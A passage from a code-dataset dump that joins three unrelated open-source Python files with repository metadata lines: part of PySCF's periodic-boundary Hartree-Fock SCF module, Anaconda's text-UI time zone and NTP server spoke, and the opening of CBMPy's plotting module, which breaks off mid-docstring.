r_frac[r_frac <-0.5] += 1
r = lib.dot(r_frac, a)
return r
# SC BCC FCC
madelung = (-2.83729747948, -3.63923344951, -4.58486207411)
vol = cell.vol
L = vol ** (1./3)
chg = cell.charge
# epsilon is the dielectric constant of the system. For systems
# surrounded by vacuum, epsilon = 1.
epsilon = 1
# Energy correction of point charges of a simple cubic lattice.
de_mono = - chg**2 * np.array(madelung) / (2 * L * epsilon)
# dipole energy correction
r_e = shift_grids(grids.coords)
r_nuc = shift_grids(cell.atom_coords())
charges = cell.atom_charges()
e_dip = np.einsum('g,g,gx->x', rho, grids.weights, r_e)
nuc_dip = np.einsum('g,gx->x', charges, r_nuc)
dip = nuc_dip - e_dip
de_dip = -2.*np.pi/(3*cell.vol) * np.linalg.norm(dip)**2
# quadrupole energy correction
if abs(a - np.eye(3)*L).max() > 1e-5:
logger.warn(mf, 'System is not cubic cell. Quadrupole energy '
'correction is inaccurate since it is developed based on '
'cubic cell.')
e_quad = np.einsum('g,g,gx,gx->', rho, grids.weights, r_e, r_e)
nuc_quad = np.einsum('g,gx,gx->', charges, r_nuc, r_nuc)
quad = nuc_quad - e_quad
de_quad = 2.*np.pi/(3*cell.vol) * quad
de = de_mono + de_dip + de_quad
return de_mono, de_dip, de_quad, de
def makov_payne_correction(mf):
'''Makov-Payne correction (Phys. Rev. B, 51, 4014)
'''
cell = mf.cell
logger.note(mf, 'Makov-Payne correction for charged 3D PBC systems')
# PRB 51 (1995), 4014
# PRB 77 (2008), 115139
if cell.dimension != 3:
logger.warn(mf, 'Correction for low-dimension PBC systems'
'is not available.')
return 0
de_mono, de_dip, de_quad, de = _dip_correction(mf)
if mf.verbose >= logger.NOTE:
write = mf.stdout.write
write('Corrections (AU)\n')
write(' Monopole Dipole Quadrupole total\n')
write('SC %12.8f %12.8f %12.8f %12.8f\n' %
(de_mono[0], de_dip , de_quad , de[0]))
write('BCC %12.8f %12.8f %12.8f %12.8f\n' %
(de_mono[1], de_dip , de_quad , de[1]))
write('FCC %12.8f %12.8f %12.8f %12.8f\n' %
(de_mono[2], de_dip , de_quad , de[2]))
return de
class SCF(mol_hf.SCF):
'''SCF base class adapted for PBCs.
Attributes:
kpt : (3,) ndarray
The AO k-point in Cartesian coordinates, in units of 1/Bohr.
exxdiv : str
Exchange divergence treatment, can be one of
| None : ignore G=0 contribution in exchange
| 'ewald' : Ewald probe charge correction [JCP 122, 234102 (2005); DOI:10.1063/1.1926272]
with_df : density fitting object
Default is the FFT based DF model. For all-electron calculation,
MDF model is favored for better accuracy. See also :mod:`pyscf.pbc.df`.
direct_scf : bool
When this flag is set to true, the J/K matrices will be computed
directly through the underlying with_df methods. Otherwise,
depending the available memory, the 4-index integrals may be cached
and J/K matrices are computed based on the 4-index integrals.
'''
direct_scf = getattr(__config__, 'pbc_scf_SCF_direct_scf', False)
def __init__(self, cell, kpt=np.zeros(3),
exxdiv=getattr(__config__, 'pbc_scf_SCF_exxdiv', 'ewald')):
if not cell._built:
sys.stderr.write('Warning: cell.build() is not called in input\n')
cell.build()
self.cell = cell
mol_hf.SCF.__init__(self, cell)
self.with_df = df.FFTDF(cell)
# Range separation JK builder
self.rsjk = None
self.exxdiv = exxdiv
self.kpt = kpt
self.conv_tol = cell.precision * 10
self._keys = self._keys.union(['cell', 'exxdiv', 'with_df', 'rsjk'])
@property
def kpt(self):
if 'kpt' in self.__dict__:
# To handle the attribute kpt loaded from chkfile
self.kpt = self.__dict__.pop('kpt')
return self.with_df.kpts.reshape(3)
@kpt.setter
def kpt(self, x):
self.with_df.kpts = np.reshape(x, (-1, 3))
if self.rsjk:
self.rsjk.kpts = self.with_df.kpts
def build(self, cell=None):
if 'kpt' in self.__dict__:
# To handle the attribute kpt loaded from chkfile
self.kpt = self.__dict__.pop('kpt')
if self.rsjk:
if not np.all(self.rsjk.kpts == self.kpt):
self.rsjk = self.rsjk.__class__(cell, self.kpt.reshape(1,3))
self.rsjk.build(direct_scf_tol=self.direct_scf_tol)
if self.verbose >= logger.WARN:
self.check_sanity()
return self
def reset(self, cell=None):
'''Reset cell and relevant attributes associated to the old cell object'''
if cell is not None:
self.cell = cell
self.mol = cell # used by hf kernel
self.with_df.reset(cell)
return self
def dump_flags(self, verbose=None):
mol_hf.SCF.dump_flags(self, verbose)
logger.info(self, '******** PBC SCF flags ********')
logger.info(self, 'kpt = %s', self.kpt)
logger.info(self, 'Exchange divergence treatment (exxdiv) = %s', self.exxdiv)
cell = self.cell
if ((cell.dimension >= 2 and cell.low_dim_ft_type != 'inf_vacuum') and
isinstance(self.exxdiv, str) and self.exxdiv.lower() == 'ewald'):
madelung = tools.pbc.madelung(cell, [self.kpt])
logger.info(self, ' madelung (= occupied orbital energy shift) = %s', madelung)
logger.info(self, ' Total energy shift due to Ewald probe charge'
' = -1/2 * Nelec*madelung = %.12g',
madelung*cell.nelectron * -.5)
logger.info(self, 'DF object = %s', self.with_df)
if not getattr(self.with_df, 'build', None):
# .dump_flags() is called in pbc.df.build function
self.with_df.dump_flags(verbose)
return self
def check_sanity(self):
mol_hf.SCF.check_sanity(self)
self.with_df.check_sanity()
if (isinstance(self.exxdiv, str) and self.exxdiv.lower() != 'ewald' and
isinstance(self.with_df, df.df.DF)):
logger.warn(self, 'exxdiv %s is not supported in DF or MDF',
self.exxdiv)
return self
def get_hcore(self, cell=None, kpt=None):
if cell is None: cell = self.cell
if kpt is None: kpt = self.kpt
if cell.pseudo:
nuc = self.with_df.get_pp(kpt)
else:
nuc = self.with_df.get_nuc(kpt)
if len(cell._ecpbas) > 0:
nuc += ecp.ecp_int(cell, kpt)
return nuc + cell.pbc_intor('int1e_kin', 1, 1, kpt)
def get_ovlp(self, cell=None, kpt=None):
if cell is None: cell = self.cell
if kpt is None: kpt = self.kpt
return get_ovlp(cell, kpt)
def get_jk(self, cell=None, dm=None, hermi=1, kpt=None, kpts_band=None,
with_j=True, with_k=True, omega=None, **kwargs):
r'''Get Coulomb (J) and exchange (K) following :func:`scf.hf.RHF.get_jk_`.
for particular k-point (kpt).
When kpts_band is given, the J, K matrices on kpts_band are evaluated.
J_{pq} = \sum_{rs} (pq|rs) dm[s,r]
K_{pq} = \sum_{rs} (pr|sq) dm[r,s]
where r,s are orbitals on kpt. p and q are orbitals on kpts_band
if kpts_band is given otherwise p and q are orbitals on kpt.
'''
if cell is None: cell = self.cell
if dm is None: dm = self.make_rdm1()
if kpt is None: kpt = self.kpt
cpu0 = (logger.process_clock(), logger.perf_counter())
dm = np.asarray(dm)
nao = dm.shape[-1]
if (not omega and kpts_band is None and
# TODO: generate AO integrals with rsjk algorithm
not self.rsjk and
(self.exxdiv == 'ewald' or not self.exxdiv) and
(self._eri is not None or cell.incore_anyway or
(not self.direct_scf and self._is_mem_enough()))):
if self._eri is None:
logger.debug(self, 'Building PBC AO integrals incore')
self._eri = self.with_df.get_ao_eri(kpt, compact=True)
vj, vk = mol_hf.dot_eri_dm(self._eri, dm, hermi, with_j, with_k)
if with_k and self.exxdiv == 'ewald':
from pyscf.pbc.df.df_jk import _ewald_exxdiv_for_G0
# G=0 is not inculded in the ._eri integrals
_ewald_exxdiv_for_G0(self.cell, kpt, dm.reshape(-1,nao,nao),
vk.reshape(-1,nao,nao))
elif self.rsjk:
vj, vk = self.rsjk.get_jk(dm.reshape(-1,nao,nao), hermi, kpt, kpts_band,
with_j, with_k, omega, exxdiv=self.exxdiv)
else:
vj, vk = self.with_df.get_jk(dm.reshape(-1,nao,nao), hermi, kpt, kpts_band,
with_j, with_k, omega, exxdiv=self.exxdiv)
if with_j:
vj = _format_jks(vj, dm, kpts_band)
if with_k:
vk = _format_jks(vk, dm, kpts_band)
logger.timer(self, 'vj and vk', *cpu0)
return vj, vk
def get_j(self, cell=None, dm=None, hermi=1, kpt=None, kpts_band=None,
omega=None):
r'''Compute J matrix for the given density matrix and k-point (kpt).
When kpts_band is given, the J matrices on kpts_band are evaluated.
J_{pq} = \sum_{rs} (pq|rs) dm[s,r]
where r,s are orbitals on kpt. p and q are orbitals on kpts_band
if kpts_band is given otherwise p and q are orbitals on kpt.
'''
return self.get_jk(cell, dm, hermi, kpt, kpts_band, with_k=False,
omega=omega)[0]
def get_k(self, cell=None, dm=None, hermi=1, kpt=None, kpts_band=None,
omega=None):
'''Compute K matrix for the given density matrix.
'''
return self.get_jk(cell, dm, hermi, kpt, kpts_band, with_j=False,
omega=omega)[1]
def get_veff(self, cell=None, dm=None, dm_last=0, vhf_last=0, hermi=1,
kpt=None, kpts_band=None):
'''Hartree-Fock potential matrix for the given density matrix.
See :func:`scf.hf.get_veff` and :func:`scf.hf.RHF.get_veff`
'''
if cell is None: cell = self.cell
if dm is None: dm = self.make_rdm1()
if kpt is None: kpt = self.kpt
if self.rsjk and self.direct_scf:
# Enable direct-SCF for real space JK builder
ddm = dm - dm_last
vj, vk = self.get_jk(cell, ddm, hermi, kpt, kpts_band)
vhf = vj - vk * .5
vhf += vhf_last
else:
vj, vk = self.get_jk(cell, dm, hermi, kpt, kpts_band)
vhf = vj - vk * .5
return vhf
def get_jk_incore(self, cell=None, dm=None, hermi=1, kpt=None, omega=None,
**kwargs):
'''Get Coulomb (J) and exchange (K) following :func:`scf.hf.RHF.get_jk_`.
*Incore* version of Coulomb and exchange build only.
Currently RHF always uses PBC AO integrals (unlike RKS), since
exchange is currently computed by building PBC AO integrals.
'''
if omega:
raise NotImplementedError
if cell is None: cell = self.cell
if kpt is None: kpt = self.kpt
if self._eri is None:
self._eri = self.with_df.get_ao_eri(kpt, compact=True)
return self.get_jk(cell, dm, hermi, kpt)
def energy_nuc(self):
return self.cell.energy_nuc()
get_bands = get_bands
get_rho = get_rho
@lib.with_doc(dip_moment.__doc__)
def dip_moment(self, cell=None, dm=None, unit='Debye', verbose=logger.NOTE,
**kwargs):
rho = kwargs.pop('rho', None)
if rho is None:
rho = self.get_rho(dm)
if cell is None:
cell = self.cell
return dip_moment(cell, dm, unit, verbose, rho=rho, kpt=self.kpt, **kwargs)
def _finalize(self):
'''Hook for dumping results and clearing up the object.'''
mol_hf.SCF._finalize(self)
if self.cell.charge != 0:
makov_payne_correction(self)
return self
def get_init_guess(self, cell=None, key='minao'):
if cell is None: cell = self.cell
dm = mol_hf.SCF.get_init_guess(self, cell, key)
dm = normalize_dm_(self, dm)
return dm
def init_guess_by_1e(self, cell=None):
if cell is None: cell = self.cell
if cell.dimension < 3:
logger.warn(self, 'Hcore initial guess is not recommended in '
'the SCF of low-dimensional systems.')
return mol_hf.SCF.init_guess_by_1e(self, cell)
def init_guess_by_chkfile(self, chk=None, project=None, kpt=None):
if chk is None: chk = self.chkfile
if kpt is None: kpt = self.kpt
return init_guess_by_chkfile(self.cell, chk, project, kpt)
def from_chk(self, chk=None, project=None, kpt=None):
return self.init_guess_by_chkfile(chk, project, kpt)
def dump_chk(self, envs):
if self.chkfile:
mol_hf.SCF.dump_chk(self, envs)
with h5py.File(self.chkfile, 'a') as fh5:
fh5['scf/kpt'] = self.kpt
return self
def _is_mem_enough(self):
nao = self.cell.nao_nr()
if abs(self.kpt).sum() < 1e-9:
mem_need = nao**4*8/4/1e6
else:
mem_need = nao**4*16/1e6
return mem_need + lib.current_memory()[0] < self.max_memory*.95
def density_fit(self, auxbasis=None, with_df=None):
from pyscf.pbc.df import df_jk
return df_jk.density_fit(self, auxbasis, with_df=with_df)
def rs_density_fit(self, auxbasis=None, with_df=None):
from pyscf.pbc.df import rsdf_jk
return rsdf_jk.density_fit(self, auxbasis, with_df=with_df)
def mix_density_fit(self, auxbasis=None, with_df=None):
from pyscf.pbc.df import mdf_jk
return mdf_jk.density_fit(self, auxbasis, with_df=with_df)
def sfx2c1e(self):
from pyscf.pbc.x2c import sfx2c1e
return sfx2c1e.sfx2c1e(self)
x2c = x2c1e = sfx2c1e
def to_rhf(self, mf):
'''Convert the input mean-field object to a RHF/ROHF/RKS/ROKS object'''
return addons.convert_to_rhf(mf)
def to_uhf(self, mf):
'''Convert the input mean-field object to a UHF/UKS object'''
return addons.convert_to_uhf(mf)
def to_ghf(self, mf):
'''Convert the input mean-field object to a GHF/GKS object'''
return addons.convert_to_ghf(mf)
def nuc_grad_method(self, *args, **kwargs):
raise NotImplementedError
def jk_method(self, J='FFTDF', K=None):
'''
Set up the schemes to evaluate Coulomb and exchange matrix
FFTDF: planewave density fitting using Fast Fourier Transform
AFTDF: planewave density fitting using analytic Fourier Transform
GDF: Gaussian density fitting
MDF: Gaussian and planewave mix density fitting
RS: range-separation JK builder
RSDF: range-separation density fitting
'''
if K is None:
K = J
if J != K:
raise NotImplementedError('J != K')
if 'DF' in J or 'DF' in K:
if 'DF' in J and 'DF' in K:
assert J == K
else:
df_method = J if 'DF' in J else K
self.with_df = getattr(df, df_method)(self.cell, self.kpt)
if 'RS' in J or 'RS' in K:
if not gamma_point(self.kpt):
raise NotImplementedError('Single k-point must be gamma point')
self.rsjk = RangeSeparationJKBuilder(self.cell, self.kpt)
self.rsjk.verbose = self.verbose
# For nuclear attraction
if J == 'RS' and K == 'RS' and not isinstance(self.with_df, df.GDF):
self.with_df = df.GDF(self.cell, self.kpt)
nuc = self.with_df.__class__.__name__
logger.debug1(self, 'Apply %s for J, %s for K, %s for nuc', J, K, nuc)
return self
class RHF(SCF, mol_hf.RHF):
stability = mol_hf.RHF.stability
def convert_from_(self, mf):
'''Convert given mean-field object to RHF'''
addons.convert_to_rhf(mf, self)
return self
def _format_jks(vj, dm, kpts_band):
if kpts_band is None:
vj = vj.reshape(dm.shape)
elif kpts_band.ndim == 1: # a single k-point on bands
vj = vj.reshape(dm.shape)
elif getattr(dm, "ndim", 0) == 2:
vj = vj[0]
return vj
def normalize_dm_(mf, dm):
'''
Scale density matrix to make it produce the correct number of electrons.
'''
cell = mf.cell
if isinstance(dm, np.ndarray) and dm.ndim == 2:
ne = np.einsum('ij,ji->', dm, mf.get_ovlp(cell)).real
else:
ne = np.einsum('xij,ji->', dm, mf.get_ovlp(cell)).real
if abs(ne - cell.nelectron).sum() > 1e-7:
logger.debug(mf, 'Big error detected in the electron number '
'of initial guess density matrix (Ne/cell = %g)!\n'
' This can cause huge error in Fock matrix and '
'lead to instability in SCF for low-dimensional '
'systems.\n DM is normalized wrt the number '
'of electrons %s', ne, cell.nelectron)
dm *= cell.nelectron / ne
return dm
| sunqm/pyscf | pyscf/pbc/scf/hf.py | Python | apache-2.0 | 32,323 | [
"CRYSTAL",
"Gaussian",
"PySCF"
] | 11675282fa5c18eebf20847d3b497d6a13d3bc0637ebf1e89c3c15e16df8805a |
# Timezone text spoke
#
# Copyright (C) 2012 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# the GNU General Public License v.2, or (at your option) any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY expressed or implied, including the implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details. You should have received a copy of the
# GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA. Any Red Hat trademarks that are incorporated in the
# source code or documentation are not subject to the GNU General Public
# License and may only be used or replicated with the express permission of
# Red Hat, Inc.
#
from pyanaconda.modules.common.constants.services import TIMEZONE
from pyanaconda.ui.categories.localization import LocalizationCategory
from pyanaconda.ui.tui.spokes import NormalTUISpoke
from pyanaconda.ui.common import FirstbootSpokeMixIn
from pyanaconda import timezone
from pyanaconda import ntp
from pyanaconda.core import constants
from pyanaconda.core.i18n import N_, _, C_
from pyanaconda.threading import threadMgr, AnacondaThread
from pyanaconda.flags import flags
from collections import OrderedDict, namedtuple
from threading import RLock
from simpleline.render.containers import ListColumnContainer
from simpleline.render.screen import InputState
from simpleline.render.widgets import TextWidget
from simpleline.render.screen_handler import ScreenHandler
from simpleline.render.prompt import Prompt
from pyanaconda.anaconda_loggers import get_module_logger
log = get_module_logger(__name__)
CallbackTimezoneArgs = namedtuple("CallbackTimezoneArgs", ["region", "timezone"])
def format_ntp_status_list(servers):
ntp_server_states = {
constants.NTP_SERVER_OK: _("status: working"),
constants.NTP_SERVER_NOK: _("status: not working"),
constants.NTP_SERVER_QUERY: _("checking status")
}
status_list = []
for server, server_state in servers.items():
status_list.append("%s (%s)" % (server, ntp_server_states[server_state]))
return status_list
__all__ = ["TimeSpoke"]
class TimeSpoke(FirstbootSpokeMixIn, NormalTUISpoke):
helpFile = "DateTimeSpoke.txt"
category = LocalizationCategory
def __init__(self, data, storage, payload):
NormalTUISpoke.__init__(self, data, storage, payload)
self.title = N_("Time settings")
self._timezone_spoke = None
self._container = None
# we use an ordered dict to keep the NTP server insertion order
self._ntp_servers = OrderedDict()
self._ntp_servers_lock = RLock()
self._timezone_module = TIMEZONE.get_proxy()
@property
def indirect(self):
return False
def initialize(self):
self.initialize_start()
# We get the initial NTP servers (if any):
# - from kickstart when running inside of Anaconda
# during the installation
# - from config files when running in Initial Setup
# after the installation
ntp_servers = []
if constants.ANACONDA_ENVIRON in flags.environs:
ntp_servers = self._timezone_module.NTPServers
elif constants.FIRSTBOOT_ENVIRON in flags.environs:
ntp_servers = ntp.get_servers_from_config()[1] # returns a (NPT pools, NTP servers) tupple
else:
log.error("tui time spoke: unsupported environment configuration %s,"
"can't decide where to get initial NTP servers", flags.environs)
# check if the NTP servers appear to be working or not
if ntp_servers:
for server in ntp_servers:
self._ntp_servers[server] = constants.NTP_SERVER_QUERY
# check if the newly added NTP servers work fine
self._check_ntp_servers_async(self._ntp_servers.keys())
# we assume that the NTP spoke is initialized enough even if some NTP
# server check threads might still be running
self.initialize_done()
def _check_ntp_servers_async(self, servers):
"""Asynchronously check if given NTP servers appear to be working.
:param list servers: list of servers to check
"""
for server in servers:
threadMgr.add(AnacondaThread(prefix=constants.THREAD_NTP_SERVER_CHECK,
target=self._check_ntp_server,
args=(server,)))
def _check_ntp_server(self, server):
"""Check if an NTP server appears to be working.
:param str server: NTP server address
:returns: True if the server appears to be working, False if not
:rtype: bool
"""
log.debug("checking NTP server %s", server)
result = ntp.ntp_server_working(server)
if result:
log.debug("NTP server %s appears to be working", server)
self.set_ntp_server_status(server, constants.NTP_SERVER_OK)
else:
log.debug("NTP server %s appears not to be working", server)
self.set_ntp_server_status(server, constants.NTP_SERVER_NOK)
@property
def ntp_servers(self):
"""Return a list of NTP servers known to the Time spoke.
:returns: a list of NTP servers
:rtype: list of strings
"""
return self._ntp_servers
def add_ntp_server(self, server):
"""Add NTP server address to our internal NTP server tracking dictionary.
:param str server: NTP server address to add
"""
# the add & remove operations should (at least at the moment) be never
# called from different threads at the same time, but lets just use
# a lock there when we are at it
with self._ntp_servers_lock:
if server not in self._ntp_servers:
self._ntp_servers[server] = constants.NTP_SERVER_QUERY
self._check_ntp_servers_async([server])
def remove_ntp_server(self, server):
"""Remove NTP server address from our internal NTP server tracking dictionary.
:param str server: NTP server address to remove
"""
# the remove-server and set-server-status operations need to be atomic,
# so that we avoid reintroducing removed servers by setting their status
with self._ntp_servers_lock:
if server in self._ntp_servers:
del self._ntp_servers[server]
def set_ntp_server_status(self, server, status):
"""Set status for an NTP server in the NTP server dict.
The status can be "working", "not working" or "check in progress",
and is defined by three constants defined in constants.py.
:param str server: an NTP server
:param int status: status of the NTP server
"""
# the remove-server and set-server-status operations need to be atomic,
# so that we avoid reintroducing removed server by setting their status
with self._ntp_servers_lock:
if server in self._ntp_servers:
self._ntp_servers[server] = status
@property
def timezone_spoke(self):
if not self._timezone_spoke:
self._timezone_spoke = TimeZoneSpoke(self.data, self.storage, self.payload)
return self._timezone_spoke
@property
def completed(self):
return bool(self._timezone_module.Timezone)
@property
def mandatory(self):
return True
@property
def status(self):
kickstart_timezone = self._timezone_module.Timezone
if kickstart_timezone:
return _("%s timezone") % kickstart_timezone
else:
return _("Timezone is not set.")
def _summary_text(self):
"""Return summary of current timezone & NTP configuration.
:returns: current status
:rtype: str
"""
msg = ""
# timezone
kickstart_timezone = self._timezone_module.Timezone
timezone_msg = _("not set")
if kickstart_timezone:
timezone_msg = kickstart_timezone
msg += _("Timezone: %s\n") % timezone_msg
# newline section separator
msg += "\n"
# NTP
msg += _("NTP servers:")
if self._ntp_servers:
for status in format_ntp_status_list(self._ntp_servers):
msg += "\n%s" % status
else:
msg += _("not configured")
return msg
def refresh(self, args=None):
NormalTUISpoke.refresh(self, args)
summary = self._summary_text()
self.window.add_with_separator(TextWidget(summary))
if self._timezone_module.Timezone:
timezone_option = _("Change timezone")
else:
timezone_option = _("Set timezone")
self._container = ListColumnContainer(1, columns_width=78, spacing=1)
self._container.add(TextWidget(timezone_option), callback=self._timezone_callback)
self._container.add(TextWidget(_("Configure NTP servers")), callback=self._configure_ntp_server_callback)
self.window.add_with_separator(self._container)
def _timezone_callback(self, data):
ScreenHandler.push_screen_modal(self.timezone_spoke)
self.close()
def _configure_ntp_server_callback(self, data):
new_spoke = NTPServersSpoke(self.data, self.storage, self.payload, self)
ScreenHandler.push_screen_modal(new_spoke)
self.apply()
self.close()
def input(self, args, key):
""" Handle the input - visit a sub spoke or go back to hub."""
if self._container.process_user_input(key):
return InputState.PROCESSED
else:
return super().input(args, key)
def apply(self):
# update the NTP server list in kickstart
self._timezone_module.SetNTPServers(list(self.ntp_servers.keys()))
class TimeZoneSpoke(NormalTUISpoke):
"""
.. inheritance-diagram:: TimeZoneSpoke
:parts: 3
"""
category = LocalizationCategory
def __init__(self, data, storage, payload):
super().__init__(data, storage, payload)
self.title = N_("Timezone settings")
self._container = None
# it's stupid to call get_all_regions_and_timezones twice, but regions
# needs to be unsorted in order to display in the same order as the GUI
# so whatever
self._regions = list(timezone.get_all_regions_and_timezones().keys())
self._timezones = dict((k, sorted(v)) for k, v in timezone.get_all_regions_and_timezones().items())
self._lower_regions = [r.lower() for r in self._regions]
self._zones = ["%s/%s" % (region, z) for region in self._timezones for z in self._timezones[region]]
# for lowercase lookup
self._lower_zones = [z.lower().replace("_", " ") for region in self._timezones for z in self._timezones[region]]
self._selection = ""
self._timezone_module = TIMEZONE.get_proxy()
@property
def indirect(self):
return True
def refresh(self, args=None):
"""args is None if we want a list of zones or "zone" to show all timezones in that zone."""
super().refresh(args)
self._container = ListColumnContainer(3, columns_width=24)
if args and args in self._timezones:
self.window.add(TextWidget(_("Available timezones in region %s") % args))
for tz in self._timezones[args]:
self._container.add(TextWidget(tz), self._select_timezone_callback, CallbackTimezoneArgs(args, tz))
else:
self.window.add(TextWidget(_("Available regions")))
for region in self._regions:
self._container.add(TextWidget(region), self._select_region_callback, region)
self.window.add_with_separator(self._container)
def _select_timezone_callback(self, data):
self._selection = "%s/%s" % (data.region, data.timezone)
self.apply()
self.close()
def _select_region_callback(self, data):
region = data
selected_timezones = self._timezones[region]
if len(selected_timezones) == 1:
self._selection = "%s/%s" % (region, selected_timezones[0])
self.apply()
self.close()
else:
ScreenHandler.replace_screen(self, region)
def input(self, args, key):
if self._container.process_user_input(key):
return InputState.PROCESSED
else:
if key.lower().replace("_", " ") in self._lower_zones:
index = self._lower_zones.index(key.lower().replace("_", " "))
self._selection = self._zones[index]
self.apply()
return InputState.PROCESSED_AND_CLOSE
elif key.lower() in self._lower_regions:
index = self._lower_regions.index(key.lower())
if len(self._timezones[self._regions[index]]) == 1:
self._selection = "%s/%s" % (self._regions[index],
self._timezones[self._regions[index]][0])
self.apply()
self.close()
else:
ScreenHandler.replace_screen(self, self._regions[index])
return InputState.PROCESSED
# TRANSLATORS: 'b' to go back
elif key.lower() == C_('TUI|Spoke Navigation|Time Settings', 'b'):
ScreenHandler.replace_screen(self)
return InputState.PROCESSED
else:
return key
def prompt(self, args=None):
""" Customize default prompt. """
prompt = NormalTUISpoke.prompt(self, args)
prompt.set_message(_("Please select the timezone. Use numbers or type names directly"))
# TRANSLATORS: 'b' to go back
prompt.add_option(C_('TUI|Spoke Navigation|Time Settings', 'b'), _("back to region list"))
return prompt
def apply(self):
self._timezone_module.SetTimezone(self._selection)
self._timezone_module.SetKickstarted(False)
class NTPServersSpoke(NormalTUISpoke):
category = LocalizationCategory
def __init__(self, data, storage, payload, time_spoke):
super().__init__(data, storage, payload)
self.title = N_("NTP configuration")
self._container = None
self._time_spoke = time_spoke
@property
def indirect(self):
return True
def _summary_text(self):
"""Return summary of NTP configuration."""
msg = _("NTP servers:")
if self._time_spoke.ntp_servers:
for status in format_ntp_status_list(self._time_spoke.ntp_servers):
msg += "\n%s" % status
else:
msg += _("no NTP servers have been configured")
return msg
def refresh(self, args=None):
super().refresh(args)
summary = self._summary_text()
self.window.add_with_separator(TextWidget(summary))
self._container = ListColumnContainer(1, columns_width=78, spacing=1)
self._container.add(TextWidget(_("Add NTP server")), self._add_ntp_server)
# only add the remove option when we can remove something
if self._time_spoke.ntp_servers:
self._container.add(TextWidget(_("Remove NTP server")), self._remove_ntp_server)
self.window.add_with_separator(self._container)
def _add_ntp_server(self, data):
new_spoke = AddNTPServerSpoke(self.data, self.storage, self.payload, self._time_spoke)
ScreenHandler.push_screen_modal(new_spoke)
self.redraw()
def _remove_ntp_server(self, data):
new_spoke = RemoveNTPServerSpoke(self.data, self.storage, self.payload, self._time_spoke)
ScreenHandler.push_screen_modal(new_spoke)
self.redraw()
def input(self, args, key):
if self._container.process_user_input(key):
return InputState.PROCESSED
else:
return super().input(args, key)
def apply(self):
pass
class AddNTPServerSpoke(NormalTUISpoke):
category = LocalizationCategory
def __init__(self, data, storage, payload, time_spoke):
super().__init__(data, storage, payload)
self.title = N_("Add NTP server address")
self._time_spoke = time_spoke
self._new_ntp_server = None
self.value = None
@property
def indirect(self):
return True
def refresh(self, args=None):
super().refresh(args)
self.value = None
def prompt(self, args=None):
# the title is enough, no custom prompt is needed
if self.value is None: # first run or nothing entered
return Prompt(_("Enter an NTP server address and press %s") % Prompt.ENTER)
# an NTP server address has been entered
self._new_ntp_server = self.value
self.apply()
self.close()
def input(self, args, key):
# we accept any string as NTP server address, as we do an automatic
# working/not-working check on the address later
self.value = key
return InputState.DISCARDED
def apply(self):
if self._new_ntp_server:
self._time_spoke.add_ntp_server(self._new_ntp_server)
class RemoveNTPServerSpoke(NormalTUISpoke):
category = LocalizationCategory
def __init__(self, data, storage, payload, timezone_spoke):
super().__init__(data, storage, payload)
self.title = N_("Select an NTP server to remove")
self._time_spoke = timezone_spoke
self._ntp_server_index = None
@property
def indirect(self):
return True
def _summary_text(self):
"""Return a numbered listing of NTP servers."""
msg = ""
for index, status in enumerate(format_ntp_status_list(self._time_spoke.ntp_servers), start=1):
msg += "%d) %s" % (index, status)
if index < len(self._time_spoke.ntp_servers):
msg += "\n"
return msg
def refresh(self, args=None):
super().refresh(args)
summary = self._summary_text()
self.window.add_with_separator(TextWidget(summary))
def input(self, args, key):
try:
num = int(key)
except ValueError:
return super().input(args, key)
# we expect a number corresponding to one of the NTP servers
# in the listing - the server corresponding to the number will be
# removed from the NTP server tracking (ordered) dict
if num > 0 and num <= len(self._time_spoke.ntp_servers):
self._ntp_server_index = num - 1
self.apply()
return InputState.PROCESSED_AND_CLOSE
else:
# the user enter a number that is out of range of the
# available NTP servers, ignore it and stay in spoke
return InputState.DISCARDED
def apply(self):
if self._ntp_server_index is not None:
ntp_server_address = list(self._time_spoke.ntp_servers.keys())[self._ntp_server_index]
self._time_spoke.remove_ntp_server(ntp_server_address)
| atodorov/anaconda | pyanaconda/ui/tui/spokes/time_spoke.py | Python | gpl-2.0 | 19,410 | [
"VisIt"
] | a69ce1b82784b8e52c12e631cf07b80f2a6686dcb5c4915a22869a29667945c9 |
"""
CBMPy: CBPlot module
====================
PySCeS Constraint Based Modelling (http://cbmpy.sourceforge.net)
Copyright (C) 2009-2022 Brett G. Olivier, VU University Amsterdam, Amsterdam, The Netherlands
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>
Author: Brett G. Olivier
Contact email: bgoli@users.sourceforge.net
Last edit: $Author: bgoli $ ($Id: CBPlot.py 710 2020-04-27 14:22:34Z bgoli $)
"""
# preparing for Python 3 port
from __future__ import division, print_function
from __future__ import absolute_import
# from __future__ import unicode_literals
import os
import time
import gc
import numpy
from . import CBWrite, CBTools
from .CBConfig import __CBCONFIG__ as __CBCONFIG__
__DEBUG__ = __CBCONFIG__['DEBUG']
__version__ = __CBCONFIG__['VERSION']
_HAVE_MATPLOTLIB_ = True
try:
import matplotlib
import matplotlib.pyplot as pyplot
except ImportError:
print('No Matplotlib available')
matplotlib = None
pyplot = None
_HAVE_MATPLOTLIB_ = False
def plotFluxVariability(
fva_data,
fva_names,
fname,
work_dir=None,
title=None,
ySlice=None,
minHeight=None,
maxHeight=None,
roundec=None,
autoclose=True,
fluxval=True,
type='png',
):
"""
Plots and saves as an image the flux variability results as generated by CBSolver.FluxVariabilityAnalysis.
- *fva_data* FluxVariabilityAnalysis() FVA OUTPUT_ARRAY
- *fva_names* FluxVariabilityAnalysis() FVA OUTPUT_NAMES
- *fname* filename_base for the CSV output
- *work_dir* [default=None] if set the output directory for the csv files
- *title* [default=None] the user defined title for the graph
- *ySlice* [default=None] this sets an absolute (fixed) limit on the Y-axis (+- ySlice)
- *minHeight* [default=None] the minimum length that defined a span
- *maxHeight* [default=None] the maximum length a span can obtain, bar will be limited to maxHeight and coloured yellow
- *roundec* [default=None] an integer indicating at which decimal to round off output. Default is no rounding.
- *autoclose* [default=True] autoclose plot after save
